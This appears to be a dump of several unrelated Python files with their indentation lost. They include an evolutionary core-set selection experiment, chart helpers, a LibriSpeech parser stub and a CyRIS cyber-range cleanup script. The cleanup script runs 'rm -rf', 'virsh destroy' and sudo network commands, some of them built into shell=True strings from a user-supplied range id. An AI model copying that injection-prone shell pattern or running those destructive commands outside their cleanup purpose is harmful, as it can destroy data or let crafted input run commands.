if args.pop_size : pop_size = args.pop_size
if args.offspring_size : offspring_size = args.offspring_size
# TODO: check that min_points < max_points and max_generations > 0
# print out the current settings
logger.info("Settings of the experiment...")
logger.info("Fixed random seed:", seed)
logger.info("Selected dataset: %s; Selected classifier(s): %s" % (selectedDataset, selectedClassifiers))
# logger.info("Min points in candidate core set: %d; Max points in candidate core set: %d" % (min_points_in_core_set, max_points_in_core_set))
logger.info("Population size in EA: %d; Offspring size: %d; Max generations: %d" % (pop_size, offspring_size, max_generations))
# create the list of classifiers
classifierList = [ x for x in allClassifiers if x[1] in selectedClassifiers ]
# pick the dataset
db_index = -1
for i in range(0, len(dataList)) :
if dataList[i][3] == selectedDataset :
db_index = i
dbname = dataList[db_index][3]
X, y = dataList[db_index][0], dataList[db_index][1]
number_classes = np.unique(y).shape[0]
logger.info("Creating train/test split...")
from sklearn.model_selection import StratifiedKFold
skf = StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=seed)
listOfSplits = [split for split in skf.split(X, y)]
trainval_index, test_index = listOfSplits[0]
X_trainval, y_trainval = X[trainval_index], y[trainval_index]
X_test, y_test = X[test_index], y[test_index]
    skf = StratifiedKFold(n_splits=3, shuffle=False)  # random_state has no effect when shuffle=False
listOfSplits = [split for split in skf.split(X_trainval, y_trainval)]
train_index, val_index = listOfSplits[0]
X_train, y_train = X_trainval[train_index], y_trainval[train_index]
X_val, y_val = X_trainval[val_index], y_trainval[val_index]
logger.info("Training set: %d lines (%.2f%%); test set: %d lines (%.2f%%)" % (X_trainval.shape[0], (100.0 * float(X_trainval.shape[0]/X.shape[0])), X_test.shape[0], (100.0 * float(X_test.shape[0]/X.shape[0]))))
# rescale data
scaler = StandardScaler()
sc = scaler.fit(X_train)
X = sc.transform(X)
X_trainval = sc.transform(X_trainval)
X_train = sc.transform(X_train)
X_val = sc.transform(X_val)
X_test = sc.transform(X_test)
for classifier in classifierList:
classifier_name = classifier[1]
# start creating folder name
experiment_name = os.path.join(folder_name, datetime.datetime.now().strftime("%Y-%m-%d-%H-%M")) + "-core-set-evolution-" + dbname + "-" + classifier_name
if not os.path.exists(experiment_name) : os.makedirs(experiment_name)
logger.info("Classifier used: " + classifier_name)
max_points_in_core_set = X_train.shape[0]
start = time.time()
min_points_in_core_set = number_classes
solutions, trainAccuracy, testAccuracy = evolveCoreSets(X, y, X_train, y_train, X_test, y_test, classifier, pop_size, offspring_size, max_generations, min_points_in_core_set, max_points_in_core_set, number_classes, maximize, seed=seed, experiment_name=experiment_name)
end = time.time()
exec_time = end - start
# only candidates with all classes are considered
final_archive = []
for sol in solutions :
c = sol.candidate
individual = np.array(c, dtype=bool)
indPoints = individual[ :X_train.shape[0] ]
y_core = y_train[indPoints]
if len(set(y_core)) == number_classes :
final_archive.append(sol)
# logger.info("Now saving final Pareto front in a figure...")
pareto_front_x = [ f.fitness[0] for f in final_archive ]
pareto_front_y = [ f.fitness[1] for f in final_archive ]
pareto_front_z = [ f.fitness[2] for f in final_archive ]
# figure = plt.figure(figsize=figsize)
# ax = figure.add_subplot(111)
# ax.plot(pareto_front_x, pareto_front_y, "bo-", label="Solutions in final archive")
# ax.set_title("Optimal solutions")
# ax.set_xlabel("Core set size")
# ax.set_ylabel("Error")
# ax.set_xlim([1, X_train.shape[0]])
# ax.set_ylim([0, 0.4])
# plt.tight_layout()
# plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto.png" %(dbname, classifier_name)) )
# plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto.pdf" %(dbname, classifier_name)) )
# plt.close(figure)
figure = plt.figure(figsize=figsize)
ax = figure.add_subplot(111)
ax.plot(pareto_front_x, pareto_front_y, "bo", label="Solutions in final archive")
ax.set_title("Optimal solutions")
ax.set_xlabel("Core set size")
ax.set_ylabel("Core feature size")
plt.tight_layout()
plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_xy.png" %(dbname, classifier_name)) )
plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_xy.pdf" %(dbname, classifier_name)) )
plt.close(figure)
figure = plt.figure(figsize=figsize)
ax = figure.add_subplot(111)
ax.plot(pareto_front_x, pareto_front_z, "bo", label="Solutions in final archive")
ax.set_title("Optimal solutions")
ax.set_xlabel("Core set size")
ax.set_ylabel("Error")
plt.tight_layout()
plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_xz.png" %(dbname, classifier_name)) )
plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_xz.pdf" %(dbname, classifier_name)) )
plt.close(figure)
figure = plt.figure(figsize=figsize)
ax = figure.add_subplot(111)
ax.plot(pareto_front_y, pareto_front_z, "bo", label="Solutions in final archive")
ax.set_title("Optimal solutions")
ax.set_xlabel("Core feature size")
ax.set_ylabel("Error")
plt.tight_layout()
plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_yz.png" %(dbname, classifier_name)) )
plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_yz.pdf" %(dbname, classifier_name)) )
plt.close(figure)
# initial performance
X_err, testAccuracy, model, fail_points, y_pred = evaluate_core(X_trainval, y_trainval, X_test, y_test, classifier[0], cname=classifier_name, SEED=seed)
X_err, trainAccuracy, model, fail_points, y_pred = evaluate_core(X_trainval, y_trainval, X_trainval, y_trainval, classifier[0], cname=classifier_name, SEED=seed)
# logger.info("Compute performances!")
logger.info("Problem dimensions: #samples: %d - #features: %d - #classes: %d" % (X.shape[0], X.shape[1], number_classes))
logger.info("Initial performance with #samples: %d - #features: %d --> train=%.4f, test=%.4f" % (X_trainval.shape[0], X.shape[1], trainAccuracy, testAccuracy))
logger.info("Elapsed time using EvoCore2C (seconds): %.4f" %(exec_time))
# best solution
accuracy = []
for sol in final_archive :
c = sol.candidate
individual = np.array(c, dtype=bool)
indPoints = individual[ :X_train.shape[0] ]
indFeatures = individual[ X_train.shape[0]: ]
X_core = X_train[indPoints]
X_core = X_core[:, indFeatures]
y_core = y_train[indPoints]
X_trainval_t = X_trainval[:, indFeatures]
X_train_t = X_train[:, indFeatures]
X_val_t = X_val[:, indFeatures]
X_err, accuracy_val, model, fail_points, y_pred = evaluate_core(X_core, y_core, X_val_t, y_val, classifier[0], cname=classifier_name, SEED=seed)
X_err, accuracy_train, model, fail_points, y_pred = evaluate_core(X_core, y_core, X_train_t, y_train, classifier[0], cname=classifier_name, SEED=seed)
accuracy.append( np.mean([accuracy_val, accuracy_train]) )
best_ids = np.array(np.argsort(accuracy)).astype('int')[::-1]
count = 0
for i in best_ids:
if count > 2:
break
c = final_archive[i].candidate
individual = np.array(c, dtype=bool)
indPoints = individual[ :X_train.shape[0] ]
indFeatures = individual[ X_train.shape[0]: ]
X_core = X_train[indPoints]
X_core = X_core[:, indFeatures]
y_core = y_train[indPoints]
X_t = X[:, indFeatures]
X_trainval_t = X_trainval[:, indFeatures]
X_train_t = X_train[:, indFeatures]
X_val_t = X_val[:, indFeatures]
X_test_t = X_test[:, indFeatures]
X_err, accuracy_train, model, fail_points, y_pred = evaluate_core(X_core, y_core, X_train_t, y_train, classifier[0], cname=classifier_name, SEED=seed)
X_err, accuracy_val, model, fail_points, y_pred = evaluate_core(X_core, y_core, X_val_t, y_val, classifier[0], cname=classifier_name, SEED=seed)
X_err, accuracy, model, fail_points, y_pred = evaluate_core(X_core, y_core, X_test_t, y_test, classifier[0], cname=classifier_name, SEED=seed)
logger.info("Solution %d: #samples: %d - #features: %d --> train: %.4f, val: %.4f, test: %.4f" %(count, X_core.shape[0], X_core.shape[1], accuracy_train, accuracy_val, accuracy))
if (dbname == "mnist" or dbname == "digits") and count == 0:
if dbname == "mnist":
H, W = 28, 28
if dbname == "digits":
H, W = 8, 8
# logger.info("Now saving figures...")
core_features = np.zeros((X_train.shape[1], 1))
core_features[indFeatures] = 1
core_features = np.reshape(core_features, (H, W))
flatui = ["#ffffff", "#e74c3c"]
cmap = ListedColormap(sns.color_palette(flatui).as_hex())
# sns.palplot(sns.color_palette(flatui))
X_t = np.zeros((X_core.shape[0], H*W))
k = 0
for i in range(0, len(indFeatures)):
if indFeatures[i] == True:
X_t[:, i] = X_core[:, k]
k = k + 1
# # save archetypes
# for index in range(0, len(y_core)):
# image = np.reshape(X_t[index, :], (H, W))
# plt.figure()
# plt.axis('off')
# plt.imshow(image, cmap=plt.cm.gray_r)
# plt.imshow(core_features, cmap=cmap, alpha=0.3)
# plt.title('Label: %d' %(y_core[index]))
# plt.tight_layout()
# plt.savefig( os.path.join(experiment_name, "digit_%d_idx_%d.pdf" %(y_core[index], index)) )
# plt.savefig( os.path.join(experiment_name, "digit_%d_idx_%d.png" %(y_core[index], index)) )
# plt.close()
# save test errors
e = 1
for index in range(0, len(y_test)):
if fail_points[index] == True:
image = np.reshape(X_test[index, :], (H, W))
plt.figure()
plt.axis('off')
plt.imshow(image, cmap=plt.cm.gray_r)
plt.imshow(core_features, cmap=cmap, alpha=0.3)
plt.title('Label: %d - Prediction: %d' %(y_test[index], y_pred[index]))
plt.tight_layout()
plt.savefig( os.path.join(experiment_name, "err_lab_%d_pred_%d_idx_%d.pdf" %(y_test[index], y_pred[index], e)) )
plt.savefig( os.path.join(experiment_name, "err_lab_%d_pred_%d_idx_%d.png" %(y_test[index], y_pred[index], e)) )
plt.close()
e = e + 1
# plot decision boundaries if we have only 2 dimensions!
if X_core.shape[1] == 2:
cmap = ListedColormap(sns.color_palette("bright", 3).as_hex())
xx, yy = make_meshgrid(X_t[:, 0], X_t[:, 1])
figure = plt.figure(figsize=figsize)
_, Z_0 = plot_contours(model, xx, yy, colors='k', alpha=0.2)
# plt.scatter(X_train[:, 0], X_train[:, 1], c=y_train, cmap=cmap, marker='s', alpha=0.4, label="train")
plt.scatter(X_test_t[:, 0], X_test_t[:, 1], c=y_test, cmap=cmap, marker='+', alpha=0.3, label="test")
plt.scatter(X_core[:, 0], X_core[:, 1], c=y_core, cmap=cmap, marker='D', facecolors='none', edgecolors='none', alpha=1, label="core set")
plt.scatter(X_err[:, 0], X_err[:, 1], marker='x', facecolors='k', edgecolors='k', alpha=1, label="errors")
plt.legend()
plt.title("%s - acc. %.4f" %(classifier_name, accuracy))
plt.tight_layout()
plt.savefig( os.path.join(experiment_name, "%s_EvoCore2C_%s_%d.png" %(dbname, classifier_name, count)) )
plt.savefig( os.path.join(experiment_name, "%s_EvoCore2C_%s_%d.pdf" %(dbname, classifier_name, count)) )
plt.close(figure)
if count == 0:
# using all samples in the training set
X_err, accuracy, model, fail_points, y_pred = evaluate_core(X_trainval, y_trainval, X_test, y_test, classifier[0], cname=classifier_name, SEED=seed)
X_err_t = X_err[:, indFeatures]
X_err_train, trainAccuracy, model_train, fail_points_train, y_pred_train = evaluate_core(X_trainval, y_trainval, X_trainval, y_trainval, classifier[0], cname=classifier_name, SEED=seed)
figure = plt.figure(figsize=figsize)
# _, Z_0 = plot_contours(model, xx, yy, colors='k', alpha=0.2)
plt.scatter(X_trainval_t[:, 0], X_trainval_t[:, 1], c=y_trainval, cmap=cmap, marker='s', alpha=0.4, label="train")
plt.scatter(X_test_t[:, 0], X_test_t[:, 1], c=y_test, cmap=cmap, marker='+', alpha=0.4, label="test")
plt.scatter(X_err_t[:, 0], X_err_t[:, 1], marker='x', facecolors='k', edgecolors='k', alpha=1, label="errors")
plt.legend()
plt.title("%s - acc. %.4f" %(classifier_name, accuracy))
plt.tight_layout()
plt.savefig( os.path.join(experiment_name, "%s_EvoCore2C_%s_alltrain.png" %(dbname, classifier_name)) )
plt.savefig( os.path.join(experiment_name, "%s_EvoCore2C_%s_alltrain.pdf" %(dbname, classifier_name)) )
plt.close(figure)
count = count + 1
logger.handlers.pop()
return
# function that does most of the work
def evolveCoreSets(X, y, X_train, y_train, X_test, y_test, classifier, pop_size, offspring_size, max_generations, min_points_in_core_set, max_points_in_core_set, number_classes, maximize=True, seed=None, experiment_name=None, split="") :
classifier_class = classifier[0]
classifier_name = classifier[1]
classifier_type = classifier[2]
# a few checks on the arguments
    if seed is None : seed = int( time.time() )
    if experiment_name is None :
experiment_name = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M") + "-ea-impair-" + classifier_name
elif split != "" :
experiment_name = experiment_name + "/" + classifier_name + "-split-" + split
# create filename that will be later used to store whole population
all_population_file = os.path.join(experiment_name, "all_individuals.csv")
# initialize classifier; some classifiers have random elements, and
# for our purpose, we are working with a specific instance, so we fix
# the classifier's behavior with a random seed
if classifier_type == 1: classifier = classifier_class(random_state=seed)
else : classifier = classifier_class()
# initialize pseudo-random number generation
prng = random.Random()
prng.seed(seed)
print("Computing initial classifier performance...")
referenceClassifier = copy.deepcopy(classifier)
referenceClassifier.fit(X_train, y_train)
y_train_pred = referenceClassifier.predict(X_train)
y_test_pred = referenceClassifier.predict(X_test)
y_pred = referenceClassifier.predict(X)
trainAccuracy = accuracy_score(y_train, y_train_pred)
testAccuracy = accuracy_score(y_test, y_test_pred)
overallAccuracy = accuracy_score(y, y_pred)
print("Initial performance: train=%.4f, test=%.4f, overall=%.4f" % (trainAccuracy, testAccuracy, overallAccuracy))
print("\nSetting up evolutionary algorithm...")
ea = inspyred.ec.emo.NSGA2(prng)
ea.variator = [ variate ]
ea.terminator = inspyred.ec.terminators.generation_termination
ea.observer = observeCoreSets
final_population = ea.evolve(
generator = generateCoreSets,
evaluator = evaluateCoreSets,
pop_size = pop_size,
num_selected = offspring_size,
maximize = maximize,
max_generations = max_generations,
# extra arguments here
n_classes = number_classes,
classifier = classifier,
X=X,
y=y,
X_train = X_train,
y_train = y_train,
X_test = X_test,
y_test = y_test,
min_points_in_core_set = min_points_in_core_set,
max_points_in_core_set = max_points_in_core_set,
experimentName = experiment_name,
all_population_file = all_population_file,
current_time = datetime.datetime.now()
)
final_archive = sorted(ea.archive, key = lambda x : x.fitness[1])
return final_archive, trainAccuracy, testAccuracy
def setup_logger(name, log_file, level=logging.INFO):
"""Function setup as many loggers as you want"""
formatter = logging.Formatter('%(asctime)s %(message)s')
handler = logging.FileHandler(log_file)
handler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.setLevel(level)
logger.addHandler(handler)
return logger
# utility function to load the covtype dataset
def loadForestCoverageType() :
inputFile = "../data/covtype.csv"
#logger.info("Loading file \"" + inputFile + "\"...")
df_covtype = read_csv(inputFile, delimiter=',', header=None)
# class is the last column
    covtype = df_covtype.values  # .values replaces the deprecated .as_matrix()
X = covtype[:,:-1]
y = covtype[:,-1].ravel()-1
return X, y
def loadMNIST():
mnist = tf.keras.datasets.mnist
(x_train, y_train),(x_test, y_test) = mnist.load_data()
X = np.concatenate((x_train, x_test))
X = np.reshape(X, (X.shape[0], X.shape[1] * X.shape[1]))
y = np.concatenate((y_train, y_test))
return X, y
def make_meshgrid(x, y, h=.02):
x_min, x_max = x.min() - 1, x.max() + 1
y_min, y_max = y.min() - 1, y.max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
return xx, yy
def plot_contours(clf, xx, yy, **params):
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
out = plt.contour(xx, yy, Z, **params)
return out, Z
def evaluate_core(X_core, y_core, X, y, classifier, cname=None, SEED=0):
if cname == "SVC":
referenceClassifier = copy.deepcopy(classifier(random_state=SEED, probability=True))
else:
referenceClassifier = copy.deepcopy(classifier(random_state=SEED))
referenceClassifier.fit(X_core, y_core)
y_pred = referenceClassifier.predict(X)
fail_points = y != y_pred
X_err = X[fail_points]
accuracy = accuracy_score( y, y_pred)
return X_err, accuracy, referenceClassifier, fail_points, y_pred
# initial random generation of core sets (as binary strings)
def generateCoreSets(random, args) :
individual_length = args["X_train"].shape[0] + args["X_train"].shape[1]
individual = [0] * individual_length
points_in_core_set = random.randint( args["min_points_in_core_set"], args["max_points_in_core_set"] )
for i in range(points_in_core_set) :
random_index = random.randint(0, args["X_train"].shape[0]-1)
individual[random_index] = 1
features_in_core_set = random.randint( 1, args["X_train"].shape[1] )
for i in range(features_in_core_set) :
random_index = random.randint(args["X_train"].shape[0], individual_length-1)
individual[random_index] = 1
return individual
# using inspyred's notation, here is a single operator that performs both
# crossover and mutation, sequentially
@inspyred.ec.variators.crossover
def variate(random, parent1, parent2, args) :
# well, for starters we just crossover two individuals, then mutate
children = [ list(parent1), list(parent2) ]
# one-point crossover!
cutPoint = random.randint(0, len(children[0])-1)
for index in range(0, cutPoint+1) :
temp = children[0][index]
children[0][index] = children[1][index]
children[1][index] = temp
# mutate!
for child in children :
mutationPoint = random.randint(0, len(child)-1)
if child[mutationPoint] == 0 :
child[mutationPoint] = 1
else :
child[mutationPoint] = 0
# check if individual is still valid, and (in case it isn't) repair it
for child in children :
if args.get("max_points_in_core_set", None) != None and args.get("min_points_in_core_set", None) != None :
points_in_core_set = [ index for index, value in enumerate(child) if value == 1 and index < args["X_train"].shape[0] ]
while len(points_in_core_set) > args["max_points_in_core_set"] :
index = random.choice( points_in_core_set )
child[index] = 0
points_in_core_set = [ index for index, value in enumerate(child) if value == 1 ]
if len(points_in_core_set) < args["min_points_in_core_set"] :
index = random.choice( [ index for index, value in enumerate(child) if value == 0 ] )
child[index] = 1
points_in_core_set = [ index for index, value in enumerate(child) if value == 1 ]
features_in_core_set = [ index for index, value in enumerate(child) if value == 1 and index > args["X_train"].shape[0] ]
if len(features_in_core_set) < 1 :
index = random.choice( [ index for index, value in enumerate(child) if value == 0 and index > args["X_train"].shape[0] ] )
child[index] = 1
features_in_core_set = [ index for index, value in enumerate(child) if value == 1 and index > args["X_train"].shape[0] ]
return children
# function that evaluates the core sets
def evaluateCoreSets(candidates, args) :
fitness = []
for c in candidates :
#print("candidate:", c)
cAsBoolArray = np.array(c, dtype=bool)
cPoints = cAsBoolArray[ :args["X_train"].shape[0] ]
cFeatures = cAsBoolArray[ args["X_train"].shape[0]: ]
X_train_reduced = args["X_train"][cPoints, :]
X_train_reduced = X_train_reduced[:, cFeatures]
y_train_reduced = args["y_train"][cPoints]
#print("Reduced training set:", X_train_reduced.shape[0])
#print("Reduced training set:", y_train_reduced.shape[0])
if len(set(y_train_reduced)) == args["n_classes"] :
classifier = copy.deepcopy( args["classifier"] )
classifier.fit(X_train_reduced, y_train_reduced)
# evaluate accuracy for every point (training, test)
X_train = args["X_train"]
y_pred_train = classifier.predict( X_train[:, cFeatures] )
#y_pred_test = classifier.predict( args["X_test"] )
#y_pred = np.concatenate((y_pred_train, y_pred_test))
#y = np.concatenate((args["y_train"], args["y_test"]))
#accuracy = accuracy_score(y, y_pred)
accuracy = accuracy_score(args["y_train"], y_pred_train)
error = round(1-accuracy, 4)
# also store valid individual
# all_population_file = args.get("all_population_file", None)
# if all_population_file != None :
#
# # if the file does not exist, write header
# if not os.path.exists(all_population_file) :
# with open(all_population_file, "w") as fp :
# fp.write("#points,accuracy,individual\n")
#
# # in any case, append individual
# with open(all_population_file, "a") as fp :
# fp.write( str(len([ x for x in c if x == 1])) )
# fp.write( "," + str(accuracy) )
#
# for g in c :
# fp.write( "," + str(g) )
# fp.write("\n")
else:
# individual gets a horrible fitness value
maximize = args["_ec"].maximize # let's fetch the bool that tells us if we are maximizing or minimizing
if maximize == True :
error = -np.inf
else :
error = np.inf
# maximizing the points removed also means minimizing the number of points taken (LOL)
corePoints = sum(cPoints)
coreFeatures = sum(cFeatures)
fitness.append( inspyred.ec.emo.Pareto( [corePoints, coreFeatures, error] ) )
return fitness
# the 'observer' function is called by inspyred algorithms at the end of every generation
def observeCoreSets(population, num_generations, num_evaluations, args) :
# training_set_size = args["X_train"].shape[0]
old_time = args["current_time"]
current_time = datetime.datetime.now()
delta_time = current_time - old_time
# I don't like the 'timedelta' string format, so here is some fancy formatting
delta_time_string = str(delta_time)[:-7] + "s"
print("[%s] Generation %d, Random individual: #samples=%d, #features=%d, error=%.2f" % (delta_time_string, num_generations, population[0].fitness[0], population[0].fitness[1], population[0].fitness[2]))
args["current_time"] = current_time
return
if __name__ == "__main__" :
# dataList = [
# ["blobs", 200, 1000],
# ["circles", 200, 1000],
# ["moons", 200, 1000],
# ["iris4", 200, 1000],
# ["iris2", 500, 500],
# ["digits", 200, 1000],
# #["covtype", 10, 5],
# #["mnist", 10, 5],
# ]
dataList = [
# ["blobs", 200, 200],
# ["circles", 200, 200],
# ["moons", 200, 200],
# ["iris4", 20, 20],
# ["iris2", 200, 200],
# ["digits", 200, 200],
# ["wine", 200, 200],
# ["breast", 200, 200],
# ["pairs", 200, 200],
# ["olivetti", 200, 200],
# ["covtype", 200, 200],
# ["mnist", 200, 200],
# ["plants", 200, 200],
# ["isolet", 200, 200],
# ["ctg", 200, 200],
# ["ozone", 200, 200],
# ["ilpd", 200, 200],
# ["biodeg", 200, 200],
# ["hill-valley", 200, 200],
]
# dataList = [
# ["blobs", 100, 100],
# ["circles", 100, 100],
# ["moons", 100, 100],
# ["iris4", 100, 100],
# ["iris2", 100, 100],
# ["digits", 100, 100],
# ["covtype", 100, 100],
# ["mnist", 100, 100],
# ]
for dataset in dataList:
main(dataset[0], dataset[1], dataset[2])
sys.exit()
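# Illustrative invocation (the script file name is an assumption, not from the
# original): once an entry such as ["wine", 100, 100] is uncommented in the
# dataList above, the command-line flags defined in main() can override it, e.g.
#   python evocore2c.py --dataset wine --classifiers SVC -p 100 -o 200 -mg 100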
|
# rndly.py
import numpy as np
import time
class RNDLy:
def __init__(self):
self.name = 'rndly'
def predict(self,queryList):
lo = 0.0
hi = 1.0
n = len(queryList)
preds = np.random.uniform(lo,hi,n)
preds = preds.tolist()
time.sleep(0.5)
return preds
def close(self):
pass
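# Hypothetical usage sketch (added for illustration, not part of the original
# module): RNDLy simply returns one uniform random score per query.
if __name__ == '__main__':
    model = RNDLy()
    print(model.predict(['query one', 'query two']))
    model.close()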
|
from .YelpAPI import YelpAuth
from .YelpAPI import YelpAPI
from .HereAPI import HereAuth
from .HereAPI import HereAPI
|
#!/usr/bin/python
#############################################################################
# Range cleanup program
#############################################################################
import os
import sys
import subprocess
import logging
import parse_config
logging.basicConfig(level=logging.INFO, format='* %(levelname)s: %(filename)s: %(message)s')
# Default values for the essential parameters
RANGE_ID = 123
CYRIS_PATH = "/home/cyuser/cyris/"
RANGE_PATH = "/home/cyuser/cyris/cyber_range/"
# Constants
SETTINGS_DIR = "settings/"
DESTRUCTION_SCRIPT1 = "whole-controlled-destruction.sh"
DESTRUCTION_SCRIPT2 = "destruct_cyberrange.sh" # Not used yet
# Try to call the range destruction script prepared by CyRIS
# Return True on success, False on failure, or if the script does not exist
def range_destruction(range_id, range_path):
# Create the full name of the destruction script
destruction_script_full = "{0}{1}/{2}".format(range_path, range_id, DESTRUCTION_SCRIPT1)
if os.path.isfile(destruction_script_full):
# Try to call the script
logging.debug("Use destruction script: " + destruction_script_full)
exit_value = subprocess.call(["bash", destruction_script_full])
if exit_value == 0:
return True
# Code below is not working for some reason, but we'll try again in the future to enable it,
# as the script "destruct_cyberrange.sh" is created earlier than "whole-controlled-destruction.sh",
# hence it could be used instead for forceful cleanup
# else:
# destruction_script_full = "{0}{1}/{2}".format(range_path, range_id, DESTRUCTION_SCRIPT2)
# if os.path.isfile(destruction_script_full):
# # Try to call the script
# logging.debug("Use destruction script: " + destruction_script_full)
# exit_value = subprocess.call(["bash", destruction_script_full])
# if exit_value == 0:
# return True
logging.warning("Destruction script not found or error.")
return False
# Forceful cleanup of storage (relevant files and directories)
def storage_cleanup(range_id, cyris_path, range_path):
# Create the range directory name
range_dir = "{0}{1}/".format(range_path, range_id)
# Try to call the script
logging.info("Clean up range directory: " + range_dir)
# Run rm command (should use confirmation?)
subprocess.call(["rm", "-rf", range_dir])
# TODO: clean up special files in settings: 123pssh.txt, etc.
pscp_filename = "{0}{1}{2}pscp_host.txt".format(cyris_path, SETTINGS_DIR, range_id)
pssh_filename = "{0}{1}{2}pssh_host.txt".format(cyris_path, SETTINGS_DIR, range_id)
logging.info("Clean up range host files: " + pscp_filename + " and " + pssh_filename)
subprocess.call(["rm", "-f", pscp_filename])
subprocess.call(["rm", "-f", pssh_filename])
# Forceful cleanup via KVM virsh
def kvm_cleanup(range_id):
range_string = "_cr{}_".format(range_id)
command = "virsh list --all"
    output = subprocess.check_output(command, shell=True, universal_newlines=True)
lines = output.splitlines()
cleanup_done = False
logging.info("Clean up KVM domains containing 'cr{}'.".format(range_id))
for line in lines:
if range_string in line:
fields = line.split()
for field in fields:
if range_string in field:
cleanup_done = True
subprocess.call(["virsh", "destroy", field])
subprocess.call(["virsh", "undefine", field])
if not cleanup_done:
logging.warning("No relevant KVM domains found.")
# Forceful network cleanup
def network_cleanup(range_id):
logging.info("Clean up bridges containing 'br{}'.".format(range_id))
# TODO: Use ifconfig to determine all bridge names that start with br{range_id}
bridge_name = "br{}-1-1".format(range_id)
try:
# Shut down bridge
ifdown_command = "sudo ifconfig {} down".format(bridge_name)
output = subprocess.check_output(ifdown_command, shell=True, stderr=subprocess.STDOUT)
# Delete bridge
brctl_command = "sudo brctl delbr {}".format(bridge_name)
output = subprocess.check_output(brctl_command, shell=True, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as error:
logging.warning("Error when removing bridge {}.\n Error message: {}"
.format(bridge_name, error.output.rstrip()))
def main(argv):
# Assign default values
range_id = RANGE_ID
cyris_path = CYRIS_PATH
range_path = RANGE_PATH
if len(argv) >= 1:
# First argument (if exists) is range id
range_id = argv[0]
if len(argv) >= 2:
# Second argument (if exists) is config file name
config_file = argv[1]
cyris_path_parsed, range_path_parsed, p2, p3, p4, p5, p6 = parse_config.parse_config(config_file)
if cyris_path_parsed:
cyris_path = cyris_path_parsed
if range_path_parsed:
range_path = range_path_parsed
# Handle case when directory names don't end with "/"
if not cyris_path.endswith("/"):
cyris_path += "/"
if not range_path.endswith("/"):
range_path += "/"
logging.info("Do cleanup for range #{0}.".format(range_id))
# First we try the normal range destruction
logging.info("Use scripts generated when the range was created.")
did_destroy = range_destruction(range_id, range_path)
# Then we do cleanup via KVM virsh in case normal destruction failed
if not did_destroy:
logging.info("Script execution failed => do forceful cleanup.")
logging.debug("- Clean up storage")
storage_cleanup(range_id, cyris_path, range_path)
logging.debug("- Clean up KVM files")
kvm_cleanup(range_id)
logging.debug("- Clean up network settings")
network_cleanup(range_id)
if __name__ == '__main__':
main(sys.argv[1:])
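# Illustrative invocation (the script name below is an assumption): the first
# argument is the range id, the optional second argument is a CyRIS config file
# whose path settings override the defaults above, e.g.
#   python range_cleanup.py 50 /home/cyuser/cyris/CONFIG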
|
import os
ROOT_DIR = os.path.dirname(os.path.abspath(__file__)) # This is your Project Root
DATA_DIR = os.path.join(ROOT_DIR, 'data')
|
import numpy
import plotly.figure_factory as figure_factory
import plotly.graph_objs as graph_objs
import plotly.offline as offline
# Configure plotly to run in offline mode
offline.init_notebook_mode(connected=False)
def make_bar_chart(columns, title='', x_axis=''):
"""Takes an array of dictionaries that have the keys 'column' and 'score'.
The value for the 'column' key is a string representing the name of the
column.
The value for the 'score' key is an integer.
"""
short_names = (column['column'][:40] for column in columns)
truncated_names = [
'{}…'.format(name) if len(name) > 40 else name for name in short_names
]
scores = [column['score'] for column in columns]
data = [graph_objs.Bar(x=scores, y=truncated_names, orientation='h')]
layout = graph_objs.Layout(
margin=graph_objs.layout.Margin(),
title=title,
yaxis=dict(
tickfont=dict(size=9, color='rgb(107, 107, 107)'),
tickangle=30,
automargin=True),
xaxis=dict(title=x_axis))
return graph_objs.Figure(data=data, layout=layout)
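# Illustrative usage (assumed inputs, not from the original module):
#   fig = make_bar_chart(
#       [{'column': 'median_income', 'score': 42},
#        {'column': 'population_density_per_square_kilometre', 'score': 17}],
#       title='Feature scores', x_axis='score')
#   offline.iplot(fig)
# Column names longer than 40 characters are truncated and suffixed with an ellipsis.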
def make_choropleth(fips=[],
values=[],
title='',
legend_title=None,
color_scale=None):
assert len(fips) == len(values)
default_color_scale = [
'#f7fbff', '#ebf3fb', '#deebf7', '#d2e3f3', '#c6dbef', '#b3d2e9',
'#9ecae1', '#85bcdb', '#6baed6', '#57a0ce', '#4292c6', '#3082be',
'#2171b5', '#1361a9', '#08519c', '#0b4083', '#08306b'
]
default_color_scale.reverse()
color_scale = color_scale or default_color_scale
binning_endpoints = list(
numpy.linspace(min(values), max(values),
len(color_scale) - 1))
return figure_factory.create_choropleth(
fips=fips,
values=values,
scope=['usa'],
colorscale=color_scale,
binning_endpoints=binning_endpoints,
county_outline={
'color': 'rgb(15, 15, 55)',
'width': 0.5
},
show_hover=True,
centroid_marker=dict(opacity=0),
asp=2.9,
title=title,
showlegend=(legend_title is not None),
**(dict(legend_title=legend_title) if legend_title else {}))
def make_scatterplot(xs=[], ys=[], text=[], title='', x_axis='', y_axis=''):
assert len(xs) == len(ys) == len(text)
trace = graph_objs.Scatter(x=xs, y=ys, text=text, mode='markers')
layout = graph_objs.Layout(
title=title,
hovermode='closest',
xaxis=dict(title=x_axis),
yaxis=dict(title=y_axis),
showlegend=False)
return graph_objs.Figure(data=[trace], layout=layout)
|
#!/usr/bin/env python3
"""Parse a directory contains Librispeech dataset.
Recursively search for "*.trans.txt" file in the given directory and print out
`<ID>\\t<AUDIO_PATH>\\t<TRANSCRIPTION>`
example: python parse_librispeech.py LibriSpeech/test-clean
1089-134691-0000\t/LibriSpeech/test-clean/1089/134691/1089-134691-0000.flac\tHE COULD WAIT NO LONGER
...
Dataset can be obtained from https://www.openslr.org/12
"""
import argparse
from pathlib import Path
def _parse_args():
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawTextHelpFormatter,
)
parser.add_argument(
'input_dir',
type=Path,
help='Directory where `*.trans.txt` files are searched.'
)
return parser.parse_args()
